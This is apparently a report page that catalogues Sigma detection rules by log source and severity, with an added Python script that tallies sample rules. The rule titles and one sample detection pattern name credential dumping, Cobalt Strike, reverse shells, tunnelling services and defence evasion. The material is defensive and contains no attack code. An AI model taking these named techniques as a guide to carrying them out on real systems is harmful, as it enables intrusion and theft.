  • New Connection Initiated To Potential Dead Drop Resolver Domain
  • Network Connection Initiated To DevTunnels Domain
  • Suspicious Dropbox API Usage
  • Suspicious Network Connection to IP Lookup Service APIs
  • Suspicious Non-Browser Network Communication With Google API
  • Communication To LocaltoNet Tunneling Service Initiated
  • Network Connection Initiated To Mega.nz
  • Process Initiated Network Connection To Ngrok Domain
  • Communication To Ngrok Tunneling Service Initiated
  • Potentially Suspicious Network Connection To Notion API
  • Network Communication Initiated To Portmap.IO Domain
  • Suspicious Non-Browser Network Communication With Telegram API
  • Network Connection Initiated To Visual Studio Code Tunnels Domain
  • Network Connection Initiated By Eqnedt32.EXE
  • Network Connection Initiated By IMEWDBLD.EXE
  • Network Connection Initiated Via Notepad.EXE
  • Office Application Initiated Network Connection To Non-Local IP
  • Office Application Initiated Network Connection Over Uncommon Ports
  • Python Initiated Connection
  • Outbound RDP Connections Over Non-Standard Tools
  • RDP Over Reverse SSH Tunnel
  • RDP to HTTP or HTTPS Target Ports
  • RegAsm.EXE Initiating Network Connection To Public IP
  • Remote Access Tool - AnyDesk Incoming Connection
  • Silenttrinity Stager Msbuild Activity
  • Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location
  • Network Connection Initiated By Regsvr32.EXE
  • Potentially Suspicious Malware Callback Communication
  • Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder
  • Microsoft Sync Center Suspicious Network Connections
  • Rundll32 Internet Connection
  • Uncommon Outbound Kerberos Connection
  • Potential Remote PowerShell Session Initiated
  • Communication To Uncommon Destination Ports
  • Outbound Network Connection To Public IP Via Winlogon
  • Suspicious Outbound SMTP Connections
  • Suspicious Network Connection Binary No CommandLine
  • Suspicious Wordpad Outbound Connections
  • Outbound Network Connection Initiated By Script Interpreter
  • Potentially Suspicious Wuauclt Network Connection
  • Local Network Connection Initiated By Script Interpreter
  • Potential Pikabot C2 Activity
  • Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon
  • New RDP Connection Initiated From Domain Controller
  • Dfsvc.EXE Network Connection To Non-Local IPs
  • Dfsvc.EXE Initiated Network Connection Over Uncommon Port
  • Dllhost.EXE Initiated Network Connection To Non-Local IP Address
  • HH.EXE Initiated HTTP Network Connection
  • Msiexec.EXE Initiated Network Connection Over HTTP
  • Network Connection Initiated By PowerShell Process
  • Potentially Suspicious Azure Front Door Connection
  • Network Connection Initiated From Users\Public Folder
  • Suspicious Werfault.exe Network Connection Outbound
windows-registry_event 40
  • Autorun Keys Modification
  • Creation of a Local Hidden User Account by Registry
  • Pandemic Registry Key
  • UAC Bypass Via Wsreset
  • CMSTP Execution Registry Event
  • Disable Security Events Logging Adding Reg Key MiniNt
  • Esentutl Volume Shadow Copy Service Keys
  • Wdigest CredGuard Registry Modification
  • Windows Credential Editor Registry
  • HybridConnectionManager Service Installation - Registry
  • Registry Entries For Azorult Malware
  • Potential Qakbot Registry Activity
  • PrinterNightmare Mimikatz Driver Name
  • Path To Screensaver Binary Modified
  • Narrator's Feedback-Hub Persistence
  • New DLL Added to AppCertDlls Registry Key
  • NetNTLM Downgrade Attack - Registry
  • New DLL Added to AppInit_DLLs Registry Key
  • Office Application Startup - Office Test
  • Windows Registry Trust Record Modification
  • Registry Persistence Mechanisms in Recycle Bin
  • New PortProxy Registry Entry Added
  • RedMimicry Winnti Playbook Registry Manipulation
  • WINEKEY Registry Modification
  • Run Once Task Configuration in Registry
  • Shell Open Registry Keys Manipulation
  • Security Support Provider (SSP) Added to LSA Configuration
  • Potential Credential Dumping Via LSASS SilentProcessExit Technique
  • Sticky Key Like Backdoor Usage - Registry
  • Atbroker Registry Change
  • Suspicious Run Key from Download
  • DLL Load via LSASS
  • Suspicious Camera and Microphone Access
  • OceanLotus Registry Activity
  • OilRig APT Registry Persistence
  • FlowCloud Registry Markers
  • Leviathan Registry Key Activity
  • SNAKE Malware Covert Store Registry Key
  • Diamond Sleet APT Scheduled Task Creation - Registry
  • Scheduled Task Created - Registry
windows-ps_module 35
  • Netcat The Powershell Version - PowerShell Module
  • Potential Active Directory Enumeration Using AD Module - PsModule
  • Alternate PowerShell Hosts - PowerShell Module
  • Bad Opsec Powershell Code Artifacts
  • Clear PowerShell History - PowerShell Module
  • PowerShell Decompress Commands
  • Malicious PowerShell Scripts - PoshModule
  • Suspicious Get-ADDBAccount Usage
  • PowerShell Get Clipboard
  • HackTool - Evil-WinRm Execution - PowerShell Module
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell Module
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module
  • Invoke-Obfuscation STDIN+ Launcher - PowerShell Module
  • Invoke-Obfuscation VAR+ Launcher - PowerShell Module
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module
  • Invoke-Obfuscation Via Stdin - PowerShell Module
  • Invoke-Obfuscation Via Use MSHTA - PowerShell Module
  • Invoke-Obfuscation Via Use Clip - PowerShell Module
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell Module
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module
  • Malicious PowerShell Commandlets - PoshModule
  • Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module
  • AD Groups Or Users Enumeration Using PowerShell - PoshModule
  • Remote PowerShell Session (PS Module)
  • Suspicious PowerShell Download - PoshModule
  • Use Get-NetTCPConnection - PowerShell Module
  • Suspicious PowerShell Invocations - Generic - PowerShell Module
  • Suspicious PowerShell Invocations - Specific - PowerShell Module
  • Suspicious Get Local Groups Information
  • Suspicious Computer Machine Password by PowerShell
  • Suspicious Get Information for SMB Share - PowerShell Module
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell Module
  • SyncAppvPublishingServer Bypass Powershell Restriction - PS Module
  • Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet
windows-driver_load 32
  • Credential Dumping Tools Service Execution
  • Usage Of Malicious POORTRY Signed Driver
  • PowerShell Scripts Run by a Services
  • Vulnerable AVAST Anti Rootkit Driver Load
  • Vulnerable Dell BIOS Update Driver Load
  • Vulnerable Driver Load By Name
  • Vulnerable GIGABYTE Driver Load
  • Vulnerable HW Driver Load
  • Vulnerable Lenovo Driver Load
  • Malicious Driver Load
  • PUA - System Informer Driver Load
  • Malicious Driver Load By Name
  • Driver Load From A Temporary Directory
  • PUA - Process Hacker Driver Load
  • Vulnerable Driver Load By Name
  • Vulnerable HackSys Extreme Vulnerable Driver Load
  • Vulnerable WinRing0 Driver Load
  • WinDivert Driver Load
  • Vulnerable Driver Load
  • Invoke-Obfuscation CLIP+ Launcher
  • Invoke-Obfuscation Obfuscated IEX Invocation
  • Invoke-Obfuscation STDIN+ Launcher
  • Invoke-Obfuscation VAR+ Launcher
  • Invoke-Obfuscation COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin
  • Invoke-Obfuscation Via Use Clip
  • Invoke-Obfuscation Via Use MSHTA
  • Invoke-Obfuscation Via Use Rundll32
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
  • Meterpreter or Cobalt Strike Getsystem Service Installation
  • Tap Driver Installation
windows-process_access 32
  • Suspicious In-Memory Module Execution
  • Credential Dumping by LaZagne
  • Credential Dumping Tools Accessing LSASS Memory
  • Credential Dumping by Pypykatz
  • Potential NT API Stub Patching
  • Mimikatz Detection LSASS Access
  • CMSTP Execution Process Access
  • HackTool - CobaltStrike BOF Injection Pattern
  • HackTool - Generic Process Access
  • HackTool - LittleCorporal Generated Maldoc Injection
  • HackTool - HandleKatz Duplicating LSASS Handle
  • Lsass Memory Dump via Comsvcs DLL
  • HackTool - SysmonEnte Execution
  • LSASS Memory Access by Tool With Dump Keyword In Name
  • Potential Credential Dumping Activity Via LSASS
  • Credential Dumping Activity By Python Based Tool
  • Remote LSASS Process Access Through Windows Remote Management
  • Suspicious LSASS Access Via MalSecLogon
  • Potentially Suspicious GrantedAccess Flags On LSASS
  • Credential Dumping Attempt Via WerFault
  • LSASS Access From Potentially White-Listed Processes
  • Uncommon Process Access Rights For Target Image
  • Potential Direct Syscall of NtOpenProcess
  • Credential Dumping Attempt Via Svchost
  • Suspicious Svchost Process Access
  • Function Call From Undocumented COM Interface EditionUpgradeManager
  • UAC Bypass Using WOW64 Logger DLL Hijack
  • Malware Shellcode in Verclsid Target Process
  • Potential Credential Dumping Attempt Via PowerShell
  • LSASS Access From Program In Potentially Suspicious Folder
  • Uncommon GrantedAccess Flags On LSASS
  • Potential Shellcode Injection
windows-dns_query 24
  • DNS Query for Anonfiles.com Domain - Sysmon
  • AppX Package Installation Attempts Via AppInstaller.EXE
  • Cloudflared Tunnels Related DNS Requests
  • DNS Query To Devtunnels Domain
  • DNS Query To AzureWebsites.NET By Non-Browser Process
  • DNS Server Discovery Via LDAP Query
  • DNS HybridConnectionManager Service Bus
  • Suspicious Cobalt Strike DNS Beaconing - Sysmon
  • DNS Query To MEGA Hosting Website
  • DNS Query Request By QuickAssist.EXE
  • DNS Query Request To OneLaunch Update Service
  • DNS Query Request By Regsvr32.EXE
  • DNS Query To Remote Access Software Domain From Non-Browser App
  • Suspicious DNS Query for IP Lookup Service APIs
  • TeamViewer Domain Query By Non-TeamViewer Application
  • DNS Query Tor .Onion Address - Sysmon
  • DNS Query To Ufile.io
  • DNS Query To Visual Studio Code Tunnels Domain
  • Potential SocGholish Second Stage C2 DNS Query
  • Potential Compromised 3CXDesktopApp Beaconing Activity - DNS
  • Diamond Sleet APT DNS Communication Indicators
  • DPRK Threat Actor - C2 Communication DNS Indicators
  • DNS Request From Windows Script Host
  • Possible DNS Rebinding
windows-pipe_created 20
  • PsExec Pipes Artifacts
  • CobaltStrike Named Pipe
  • ADFS Database Named Pipe Connection By Uncommon Tool
  • CobaltStrike Named Pipe Pattern Regex
  • CobaltStrike Named Pipe Patterns
  • HackTool - CoercedPotato Named Pipe Creation
  • HackTool - EfsPotato Named Pipe Creation
  • HackTool - DiagTrackEoP Default Named Pipe
  • HackTool - Koh Default Named Pipe
  • HackTool - Credential Dumping Tools Named Pipe Created
  • Alternate PowerShell Hosts Pipe
  • New PowerShell Instance Created
  • PUA - CSExec Default Named Pipe
  • PUA - PAExec Default Named Pipe
  • PUA - RemCom Default Named Pipe
  • WMI Event Consumer Created Named Pipe
  • Malicious Named Pipe Created
  • PsExec Tool Execution From Suspicious Locations - PipeName
  • Turla Group Named Pipes
  • PsExec Default Named Pipe
opencanary-application 18
  • OpenCanary - FTP Login Attempt
  • OpenCanary - GIT Clone Request
  • OpenCanary - HTTPPROXY Login Attempt
  • OpenCanary - HTTP GET Request
  • OpenCanary - HTTP POST Login Attempt
  • OpenCanary - MSSQL Login Attempt Via SQLAuth
  • OpenCanary - MSSQL Login Attempt Via Windows Authentication
  • OpenCanary - MySQL Login Attempt
  • OpenCanary - NTP Monlist Request
  • OpenCanary - REDIS Action Command Attempt
  • OpenCanary - SIP Request
  • OpenCanary - SMB File Open Request
  • OpenCanary - SNMP OID Request
  • OpenCanary - SSH Login Attempt
  • OpenCanary - SSH New Connection Attempt
  • OpenCanary - Telnet Login Attempt
  • OpenCanary - TFTP Request
  • OpenCanary - VNC Connection Attempt
rpc_firewall-application 17
  • Remote Schedule Task Lateral Movement via ATSvc
  • Remote Schedule Task Recon via AtScv
  • Possible DCSync Attack
  • Remote Event Log Recon
  • Remote Encrypting File System Abuse
  • Remote Schedule Task Lateral Movement via ITaskSchedulerService
  • Remote Schedule Task Recon via ITaskSchedulerService
  • Remote Printing Abuse for Lateral Movement
  • Remote DCOM/WMI Lateral Movement
  • Remote Registry Lateral Movement
  • Remote Registry Recon
  • Remote Server Service Abuse
  • Remote Server Service Abuse for Lateral Movement
  • Remote Schedule Task Lateral Movement via SASec
  • Recon Activity via SASec
  • SharpHound Recon Account Discovery
  • SharpHound Recon Sessions
windows-create_remote_thread 16
  • Suspicious Remote Thread Target
  • HackTool - CACTUSTORCH Remote Thread Creation
  • HackTool - Potential CobaltStrike Process Injection
  • Remote Thread Created In KeePass.EXE
  • Remote Thread Creation In Mstsc.Exe From Suspicious Location
  • Potential Credential Dumping Attempt Via PowerShell Remote Thread
  • Password Dumper Remote Thread in LSASS
  • Remote Thread Creation Via PowerShell In Uncommon Target
  • Rare Remote Thread Creation By Uncommon Source Image
  • Remote Thread Created In Shell Application
  • Remote Thread Creation By Uncommon Source Image
  • Remote Thread Creation In Uncommon Target Image
  • Remote Thread Creation Ttdinject.exe Proxy
  • Potential Bumblebee Remote Thread Creation
  • CreateRemoteThread API and LoadLibrary
  • Remote Thread Creation Via PowerShell
windows-file_delete 14
  • Potential PrintNightmare Exploitation Attempt
  • Backup Files Deleted
  • EventLog EVTX File Deleted
  • Exchange PowerShell Cmdlet History Deleted
  • Process Deletion of Its Own Executable
  • IIS WebServer Access Logs Deleted
  • PowerShell Console History Logs Deleted
  • Prefetch File Deleted
  • TeamViewer Log File Deleted
  • Tomcat WebServer Logs Deleted
  • File Deleted Via Sysinternals SDelete
  • Unusual File Deletion by Dns.exe
  • ADS Zone.Identifier Deleted By Uncommon Application
  • ADS Zone.Identifier Deleted
windows-file_access 12
  • Credential Manager Access By Uncommon Applications
  • Access To Crypto Currency Wallets By Uncommon Applications
  • Access To Windows Credential History File By Uncommon Applications
  • Access To Windows DPAPI Master Keys By Uncommon Applications
  • Access To Potentially Sensitive Sysvol Files By Uncommon Applications
  • Microsoft Teams Sensitive File Access By Uncommon Applications
  • Access To Browser Credential Files By Uncommon Applications
  • Access To Chromium Browsers Sensitive Files By Uncommon Applications
  • Access To Windows Outlook Mail Files By Uncommon Applications
  • Access To Sysvol Policies Share By Uncommon Process
  • Access To .Reg/.Hive Files By Uncommon Applications
  • Unattend.XML File Access Attempt
windows-ps_classic_start 11
  • Nslookup PowerShell Download Cradle
  • Delete Volume Shadow Copies Via WMI With PowerShell
  • PowerShell Downgrade Attack - PowerShell
  • PowerShell Called from an Executable Version Mismatch
  • Netcat The Powershell Version
  • Remote PowerShell Session (PS Classic)
  • Renamed Powershell Under Powershell Channel
  • Suspicious PowerShell Download
  • Use Get-NetTCPConnection
  • Uncommon PowerShell Hosts
  • bXOR Operator Usage In PowerShell Command Line - PowerShell Classic
windows-registry_add 10
  • Sysinternals SDelete Registry Keys
  • Potential NetWire RAT Activity - Registry
  • Potential Persistence Via New AMSI Providers - Registry
  • Potential COM Object Hijacking Via TreatAs Subkey - Registry
  • Potential Persistence Via Disk Cleanup Handler - Registry
  • Potential Persistence Via Logon Scripts - Registry
  • PUA - Sysinternal Tool Execution - Registry
  • Suspicious Execution Of Renamed Sysinternals Tools - Registry
  • PUA - Sysinternals Tools Execution - Registry
  • Potential Ursnif Malware Activity - Registry
kubernetes-application 10
  • Deployment Deleted From Kubernetes Cluster
  • Kubernetes Events Deleted
  • Potential Remote Command Execution In Pod Container
  • Container With A hostPath Mount Created
  • Privileged Container Deployed
  • Creation Of Pod In System Namespace
  • RBAC Permission Enumeration Attempt
  • Kubernetes Secrets Enumeration
  • New Kubernetes Service Account Created
  • Potential Sidecar Injection Into Running Deployment
linux-file_event 10
  • Persistence Via Sudoers Files
  • Potentially Suspicious Shell Script Creation in Profile Folder
  • Triple Cross eBPF Rootkit Default LockFile
  • Persistence Via Cron Files
  • Wget Creating Files in Tmp Directory
  • Triple Cross eBPF Rootkit Default Persistence
  • Linux Doas Conf File Creation
  • UNC4841 - Email Exfiltration File Pattern
  • UNC4841 - Barracuda ESG Exploitation Indicators
  • Python Path Configuration File Creation - Linux
windows-create_stream_hash 9
  • Creation Of a Suspicious ADS File Outside a Browser Download
  • Hidden Executable In NTFS Alternate Data Stream
  • Suspicious File Download From File Sharing Websites - File Stream
  • Unusual File Download From File Sharing Websites - File Stream
  • HackTool Named File Stream Created
  • Exports Registry Key To an Alternate Data Stream
  • Unusual File Download from Direct IP Address
  • Potential Suspicious Winget Package Installation
  • Potentially Suspicious File Download From ZIP TLD
windows-registry_delete 7
  • Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
  • Folder Removed From Exploit Guard ProtectedFolders List - Registry
  • Terminal Server Client Connection History Cleared - Registry
  • Removal Of AMSI Provider Registry Keys
  • Removal of Potential COM Hijacking Registry Keys
  • Removal Of Index Value to Hide Schedule Task - Registry
  • Removal Of SD Value to Hide Schedule Task - Registry
jvm-application 5
  • Potential JNDI Injection Exploitation In JVM Based Application
  • Potential Local File Read Vulnerability In JVM Based Application
  • Potential OGNL Injection Exploitation In JVM Based Application
  • Process Execution Error In JVM Based Application
  • Potential XXE Exploitation Attempt In JVM Based Application
linux-network_connection 5
  • Linux Reverse Shell Indicator
  • Communication To Ngrok Tunneling Service - Linux
  • Communication To LocaltoNet Tunneling Service Initiated - Linux
  • Linux Crypto Mining Pool Connections
  • Potentially Suspicious Malware Callback Communication - Linux
macos-file_event 3
  • MacOS Emond Launch Daemon
  • Startup Item File Created - MacOS
  • Python Path Configuration File Creation - MacOS
windows-wmi_event 3
  • WMI Event Subscription
  • Suspicious Scripting in a WMI Consumer
  • Suspicious Encoded Scripts in a WMI Consumer
spring-application 2
  • Spring Framework Exceptions
  • Potential SpEL Injection In Spring Framework
windows-file_change 2
  • File Creation Date Changed to Another Year
  • Unusual File Modification by dns.exe
windows-file_rename 2
  • Suspicious Appended Extension
  • Non-DLL Extension File Renamed With DLL Extension
django-application 1
  • Django Framework Exceptions
nodejs-application 1
  • Potential RCE Exploitation Attempt In NodeJS
python-application 1
  • Python SQL Exceptions
ruby_on_rails-application 1
  • Ruby on Rails Framework Exceptions
sql-application 1
  • Suspicious SQL Error Messages
velocity-application 1
  • Potential Server Side Template Injection In Velocity
windows-file_executable_detected 1
  • Potentially Suspicious Self Extraction Directive File Created
windows-ps_classic_provider_start 1
  • Tamper Windows Defender - PSClassic
windows-process_tampering 1
  • Potential Process Hollowing Activity
windows-raw_access_thread 1
  • Potential Defense Evasion Via Raw Disk Access By Uncommon Tools
windows-sysmon_error 1
  • Sysmon Configuration Error
windows-sysmon_status 1
  • Sysmon Configuration Modification
paloalto-file_event 1
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation
paloalto-appliance 1
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection
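The log-source keys above (for example windows-pipe_created or opencanary-application) and the level tallies in the next section are simple aggregations over the YAML front matter of each Sigma rule. The script below is an added example, not the SigmaTACT tool's own code, that reproduces that aggregation offline: it parses a handful of constructed stand-in rules (titles borrowed from this report, every other field illustrative), groups them by log source, level, MITRE tactic and technique, and renders the same "key count / bulleted titles" layout used on this page. It assumes the log-source key is built as "product-category", falling back to "service" when a rule has no category; the real tool's key construction is not shown on the page.

```python
"""Tally Sigma rules by logsource key, level, tactic and technique.

Added example (not SigmaTACT's own code). Assumption: the report's logsource
key is "<product>-<category>" with "service" as the fallback, which is what
keys such as "windows-pipe_created" and "windows-sysmon_error" suggest.
"""
import re
from collections import Counter, defaultdict

# Constructed sample rules. Titles are borrowed from the report; level,
# logsource, detection and tags are illustrative and not taken from Sigma.
SAMPLE_RULES = [
    """title: PsExec Default Named Pipe
level: high
logsource:
    product: windows
    category: pipe_created
detection:
    selection:
        PipeName|contains: 'PSEXESVC'
    condition: selection
tags:
    - attack.execution
    - attack.t1569.002
""",
    """title: CobaltStrike Named Pipe
level: critical
logsource:
    product: windows
    category: pipe_created
tags:
    - attack.defense_evasion
    - attack.privilege_escalation
    - attack.t1055
""",
    """title: OpenCanary - SSH Login Attempt
level: high
logsource:
    product: opencanary
    category: application
tags:
    - attack.credential_access
    - attack.t1110
""",
    """title: Sysmon Configuration Error
level: high
logsource:
    product: windows
    service: sysmon_error
tags:
    - attack.defense_evasion
    - attack.t1562.001
""",
    """title: Potential Process Hollowing Activity
level: medium
logsource:
    product: windows
    category: process_tampering
tags:
    - attack.defense_evasion
    - attack.t1055.012
""",
]

# attack.t1055 is a technique, attack.t1055.012 a sub-technique.
TECHNIQUE_RE = re.compile(r"^attack\.t\d{4}(\.\d{3})?$")


def parse_rule(text):
    """Minimal reader for the flat Sigma fields this tally needs.

    Handles top-level scalars, the nested 'logsource' mapping and the 'tags'
    list; every other nested block (e.g. 'detection') is skipped.
    """
    rule = {"logsource": {}, "tags": []}
    section = None
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        line = raw.strip()
        if indent == 0:
            key, _, value = line.partition(":")
            key, value = key.strip(), value.strip()
            section = key if value == "" else None  # block start vs scalar
            if value:
                rule[key] = value
        elif section == "logsource":
            key, _, value = line.partition(":")
            rule["logsource"][key.strip()] = value.strip()
        elif section == "tags" and line.startswith("- "):
            rule["tags"].append(line[2:].strip())
    return rule


def logsource_key(rule):
    """Build the report-style key; 'service' is the fallback (assumption)."""
    ls = rule["logsource"]
    return f"{ls.get('product', 'unknown')}-{ls.get('category') or ls.get('service') or 'unknown'}"


def classify_tag(tag):
    """Split Sigma tags into tactic / technique / subtechnique / other."""
    m = TECHNIQUE_RE.match(tag)
    if m:
        return "subtechnique" if m.group(1) else "technique"
    return "tactic" if tag.startswith("attack.") else "other"


def aggregate(rule_texts):
    """Return (counts by dimension, rule titles per logsource key)."""
    counts = {k: Counter() for k in
              ("logsource", "level", "tactic", "technique", "subtechnique", "other")}
    titles = defaultdict(list)
    for text in rule_texts:
        rule = parse_rule(text)
        key = logsource_key(rule)
        counts["logsource"][key] += 1
        counts["level"][rule.get("level", "unknown")] += 1
        titles[key].append(rule["title"])
        for tag in rule["tags"]:
            counts[classify_tag(tag)][tag] += 1
    return counts, dict(titles)


def render(counts, titles):
    """Render the page's own layout: '<key> <count>' then bulleted titles."""
    lines = ["Top Log Sources"]
    for key, n in counts["logsource"].most_common():
        lines.append(f"{key} {n}")
        lines.extend(f"  • {t}" for t in titles[key])
    lines.append("Top Levels")
    lines.extend(f"{level} {n}" for level, n in counts["level"].most_common())
    return "\n".join(lines)


if __name__ == "__main__":
    c, t = aggregate(SAMPLE_RULES)
    print(render(c, t))
```

Run against a checkout of the Sigma rules directory by replacing SAMPLE_RULES with the file contents; the hand-written reader is deliberately narrow, so for production use swap parse_rule for a real YAML loader and keep only logsource_key, classify_tag and aggregate.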

Top Levels

Level  Count  Rule Titles
high 1675
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd
  • Domestic Kitten FurBall Malware Pattern
  • CobaltStrike Malleable Amazon Browsing Traffic Profile
  • CobaltStrike Malleable (OCSP) Profile
  • CobaltStrike Malleable OneDrive Browsing Traffic Profile
  • Search-ms and WebDAV Suspicious Indicators in URL
  • Usage Of Malicious POORTRY Signed Driver
  • PowerShell Scripts Run by a Services
  • Vulnerable AVAST Anti Rootkit Driver Load
  • Vulnerable Dell BIOS Update Driver Load
  • Vulnerable GIGABYTE Driver Load
  • Vulnerable HW Driver Load
  • Vulnerable Lenovo Driver Load
  • Suspicious File Event With Teams Objects
  • CrackMapExec File Creation Patterns
  • LSASS Memory Dump File Creation
  • CreateMiniDump Hacktool
  • Suspicious CLR Logs Creation
  • Svchost DLL Search Order Hijack
  • Possible Process Hollowing Image Loading
  • Microsoft Binary Github Communication
  • Suspicious Epmap Connection
  • AzureHound PowerShell Commands
  • Execution via CL_Invocation.ps1 - Powershell
  • Execution via CL_Mutexverifiers.ps1
  • PrintNightmare Powershell Exploitation
  • Suspicious PowerShell Invocations - Generic
  • Suspicious PowerShell Invocations - Specific
  • Credential Dumping Tools Accessing LSASS Memory
  • APT29
  • GALLIUM Artefacts
  • Suspicious Certutil Command Usage
  • Hurricane Panda Activity
  • Lazarus Activity Apr21
  • Credential Acquisition via Registry Hive Dumping
  • Execution via MSSQL Xp_cmdshell Stored Procedure
  • Invoke-Obfuscation Via Use Rundll32
  • New Lolbin Process by Office Applications
  • Suspicious File Download Using Office Application
  • Execute MSDT.EXE Using Diagcab File
  • MavInject Process Injection
  • Process Memory Dumped Via RdrLeakDiag.EXE
  • Trickbot Malware Reconnaissance Activity
  • Excel Proxy Executing Regsvr32 With Payload
  • Excel Proxy Executing Regsvr32 With Payload Alternate
  • Office Applications Spawning Wmi Cli Alternate
  • PowerShell AMSI Bypass Pattern
  • Base64 Encoded Listing of Shadowcopy
  • Malicious Base64 Encoded Powershell Invoke Cmdlets
  • Suspicious Bitsadmin Job via PowerShell
  • Stop Or Remove Antivirus Service
  • Regsvr32 Anomaly
  • Registry Dump of SAM Creds and Secrets
  • Renamed PsExec
  • Renamed PowerShell
  • Renamed Rundll32.exe Execution
  • Rundll32 JS RunHTMLApplication Pattern
  • Suspicious Add Scheduled Task From User AppData Temp
  • Suspicious Execution of Sc to Delete AV Services
  • Suspicious Characters in CommandLine
  • Run Whoami as SYSTEM
  • Windows Update Client LOLBIN
  • Abusing Windows Telemetry For Persistence - Registry
  • User Account Hidden By Registry
  • Disable Microsoft Office Security Features
  • Adwind RAT / JRAT - Registry
  • Office Security Settings Changed
  • Potential Persistence Via COM Hijacking From Suspicious Locations
  • SilentProcessExit Monitor Registration
  • Accessing WinAPI in PowerShell for Credentials Dumping
  • Mimikatz Detection LSASS Access
  • RClone Execution
  • Windows Defender Threat Detection Disabled
  • Suspicious Esentutl Use
  • Correct Execution of Nltest.exe
  • Rclone Execution via Command Line or PowerShell
  • Activity Related to NTDS.dit Domain Hash Retrieval
  • New Service Uses Double Ampersand in Path
  • SAM Dump to AppData
  • Potential JNDI Injection Exploitation In JVM Based Application
  • Potential Local File Read Vulnerability In JVM Based Application
  • Potential OGNL Injection Exploitation In JVM Based Application
  • Process Execution Error In JVM Based Application
  • Potential XXE Exploitation Attempt In JVM Based Application
  • Potential RCE Exploitation Attempt In NodeJS
  • OpenCanary - FTP Login Attempt
  • OpenCanary - GIT Clone Request
  • OpenCanary - HTTPPROXY Login Attempt
  • OpenCanary - HTTP GET Request
  • OpenCanary - HTTP POST Login Attempt
  • OpenCanary - MSSQL Login Attempt Via SQLAuth
  • OpenCanary - MSSQL Login Attempt Via Windows Authentication
  • OpenCanary - MySQL Login Attempt
  • OpenCanary - NTP Monlist Request
  • OpenCanary - REDIS Action Command Attempt
  • OpenCanary - SIP Request
  • OpenCanary - SMB File Open Request
  • OpenCanary - SNMP OID Request
  • OpenCanary - SSH Login Attempt
  • OpenCanary - SSH New Connection Attempt
  • OpenCanary - Telnet Login Attempt
  • OpenCanary - TFTP Request
  • OpenCanary - VNC Connection Attempt
  • Remote Schedule Task Lateral Movement via ATSvc
  • Remote Schedule Task Recon via AtScv
  • Possible DCSync Attack
  • Remote Event Log Recon
  • Remote Encrypting File System Abuse
  • Remote Schedule Task Lateral Movement via ITaskSchedulerService
  • Remote Schedule Task Recon via ITaskSchedulerService
  • Remote Printing Abuse for Lateral Movement
  • Remote DCOM/WMI Lateral Movement
  • Remote Registry Lateral Movement
  • Remote Registry Recon
  • Remote Server Service Abuse
  • Remote Server Service Abuse for Lateral Movement
  • Remote Schedule Task Lateral Movement via SASec
  • Recon Activity via SASec
  • SharpHound Recon Account Discovery
  • SharpHound Recon Sessions
  • Potential SpEL Injection In Spring Framework
  • Suspicious SQL Error Messages
  • Potential Server Side Template Injection In Velocity
  • Antivirus Hacktool Detection
  • Antivirus Web Shell Detection
  • Antivirus Relevant File Paths Alerts
  • Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure
  • Potential Malicious Usage of CloudTrail System Manager
  • AWS Config Disabling Channel/Recorder
  • AWS EC2 Startup Shell Script Change
  • AWS GuardDuty Important Change
  • AWS IAM S3Browser Templated S3 Bucket Policy Creation
  • AWS IAM S3Browser LoginProfile Creation
  • AWS IAM S3Browser User or AccessKey Creation
  • Modification or Deletion of an AWS RDS Cluster
  • Restore Public AWS RDS Instance
  • AWS SecurityHub Findings Evasion
  • AWS Identity Center Identity Provider Change
  • AWS User Login Profile Was Modified
  • Azure Subscription Permission Elevation Via ActivityLogs
  • Account Created And Deleted Within A Close Time Frame
  • Changes to Device Registration Policy
  • Users Added to Global or Device Admin Roles
  • Application AppID Uri Configuration Changes
  • Added Credentials to Existing Application
  • Delegated Permissions Granted For All Users
  • App Granted Microsoft Permissions
  • App Granted Privileged Delegated Or App Permissions
  • Application URI Configuration Changes
  • Windows LAPS Credential Dump From Entra ID
  • PIM Approvals And Deny Elevation
  • PIM Alert Setting Changes To Disabled
  • Changes To PIM Settings
  • User Added To Privilege Role
  • Bulk Deletion Changes To Privileged Account Permissions
  • Azure Subscription Permission Elevation Via AuditLogs
  • Temporary Access Pass Added To An Account
  • User Risk and MFA Registration Policy Updated
  • Anomalous Token
  • Anomalous User Activity
  • Activity From Anonymous IP Address
  • Anonymous IP Address
  • Atypical Travel
  • Impossible Travel
  • Suspicious Inbox Forwarding Identity Protection
  • Suspicious Inbox Manipulation Rules
  • Azure AD Account Credential Leaked
  • Malicious IP Address Sign-In Failure Rate
  • Malicious IP Address Sign-In Suspicious
  • Sign-In From Malware Infected IP
  • Password Spray Activity
  • Primary Refresh Token Access Attempt
  • Suspicious Browser Activity
  • Azure AD Threat Intelligence
  • SAML Token Issuer Anomaly
  • New Country
  • Unfamiliar Sign-In Properties
  • Stale Accounts In A Privileged Role
  • Invalid PIM License
  • Roles Assigned Outside PIM
  • Roles Activation Doesn't Require MFA
  • Roles Activated Too Frequently
  • Roles Are Not Being Used
  • Too Many Global Admins
  • Discovery Using AzureHound
  • Suspicious SignIns From A Non Registered Device
  • Sign-ins from Non-Compliant Devices
  • Potential MFA Bypass Using Legacy Client Authentication
  • Sign-in Failure Due to Conditional Access Requirements Not Met
  • Use of Legacy Authentication Protocols
  • Bitbucket Full Data Export Triggered
  • Bitbucket Secret Scanning Exempt Repository Added
